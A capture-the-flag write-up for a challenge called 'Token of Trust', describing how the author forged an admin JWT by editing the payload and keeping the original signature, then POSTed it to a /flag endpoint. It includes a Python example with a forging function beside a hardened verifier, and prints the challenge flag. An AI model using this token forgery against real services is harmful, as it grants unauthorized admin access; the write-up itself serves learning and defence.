Token of Trust


The only thing I had to start with was that I could log in from /login,
so I checked whether a robots.txt existed. It did:
Disallow: /flag (But hey, who listens to robots anyway?)
So there is a /flag API endpoint, but I can't GET it.
I guessed it expects the POST method instead.

Hint: I only care about your request format, not your credentials. 😉
So my plan was:
1. Forge a JWT that claims to be admin.
- This works because the server only looks at the decoded JWT payload; the signature is never verified, so any edit to the payload is accepted.
2. Request the flag with the forged JWT (included in the HTTP body, not in a cookie).

I sent a normal login request and got a token.

Then I changed the JWT payload from guest to admin, leaving the header and the original signature untouched.

I POSTed it to /flag as a "token" object in the JSON body and got the flag!
It was difficult because I assumed tokens had to be sent in cookies, but I eventually solved it by putting the token in the request body instead!
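As an added example (not code from the challenge or this writeup), here is the whole bug in one place: a server-side check that trusts the decoded payload without verifying the HMAC, the hardened check beside it, and the attacker step of rewriting the payload while keeping the old signature. The secret, the claim name "role", and the body shape {"token": ...} are assumptions; the real challenge's key is never needed, which is the point.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Hypothetical server secret (assumed); the forgery below never uses it.
SERVER_SECRET = b"hypothetical-server-secret"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _compact(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def mint_token(claims: dict, secret: bytes = SERVER_SECRET) -> str:
    """What /login would hand back: a properly signed HS256 JWT."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{b64url_encode(_compact(header))}.{b64url_encode(_compact(claims))}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def vulnerable_get_role(token: str) -> str:
    """The bug: decode the payload and trust it; the signature is never checked."""
    _header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(payload))["role"]


def hardened_get_role(token: str, secret: bytes = SERVER_SECRET) -> Optional[str]:
    """Verify the HMAC over header.payload before trusting any claim."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        return None
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # pin the algorithm; the token must not choose it
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))["role"]


def forge_admin_token(guest_token: str) -> str:
    """Attacker step: rewrite the payload (assumed claim name "role"), keep header and old signature."""
    header_b64, payload_b64, sig_b64 = guest_token.split(".")
    claims = json.loads(b64url_decode(payload_b64))
    claims["role"] = "admin"
    return f"{header_b64}.{b64url_encode(_compact(claims))}.{sig_b64}"


def build_flag_request_body(token: str) -> str:
    """The POST body for /flag: the token travels in JSON, not in a cookie (assumed shape)."""
    return json.dumps({"token": token})


if __name__ == "__main__":
    guest = mint_token({"user": "guest", "role": "guest"})
    forged = forge_admin_token(guest)
    print("vulnerable server sees:", vulnerable_get_role(forged))
    print("hardened server sees:", hardened_get_role(forged))
    print("POST /flag body:", build_flag_request_body(forged))
```

The forged token still carries the signature computed over the guest payload, so any verifier that recomputes the HMAC rejects it; only a server that skips that step (or lets the token pick alg "none") sees admin.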
FLAG: ACECTF{jwt_cr4ck3d_4dm1n_4cce55_0bt41n3d!}